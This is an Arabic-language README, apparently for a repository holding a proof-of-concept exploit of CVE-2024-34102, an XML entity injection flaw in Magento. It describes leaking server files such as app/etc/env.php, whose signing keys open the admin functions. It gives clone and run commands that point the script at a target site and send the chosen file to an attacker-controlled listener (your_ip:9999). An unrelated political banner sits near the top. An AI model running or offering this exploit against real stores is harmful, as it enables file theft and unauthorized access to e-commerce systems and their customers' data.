
عرض PoC , ثغرة حقن كيان XML حرجة في Magento
نطالب بإعادة جميع المواطنين الذين تم أسرهم كرهائن من قبل جماعة حماس الإرهابية سالمين. لن نتوقف حتى يتم إطلاق سراح كل رهينة ويعود إلى منزله بسلام. يمكنك المساعدة في إعادتهم إلى الوطن. https://stories.bringthemhomenow.net/
يحتوي هذا المستودع على دليل استغلال (PoC) لثغرة حقن كيان XML الحرجة (CVE-2024-34102) في Magento. تسمح هذه الثغرة بتسريب الملفات الحساسة، والتي يمكن بعد ذلك استغلالها للحصول على وصول غير مصرح به إلى وظائف Magento الإدارية. صُمم هذا الدليل للأغراض التعليمية ويجب استخدامه بمسؤولية.
Magento هو أحد أشهر حلول التجارة الإلكترونية المستخدمة عالميًا. في يونيو 2024، تم اكتشاف مشكلة حقن كيان XML حرجة قبل المصادقة، تم تعريفها باسم CVE-2024-34102. يمكن أن تؤدي هذه الثغرة إلى عواقب وخيمة، بما في ذلك تسريب ملف app/etc/env.php من Magento، الذي يحتوي على مفاتيح تشفير تستخدم لتوقيع JWTs.
requests (pip install requests)استنساخ المستودع:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
تنفيذ السكربت مع الوسائط اللازمة:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: عنوان URL لمثيل Magento المستهدف.--target-file: مسار الملف على الخادم المستهدف لتسريبه.--exfil-url: عنوان URL لاستقبال البيانات المسربة.python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999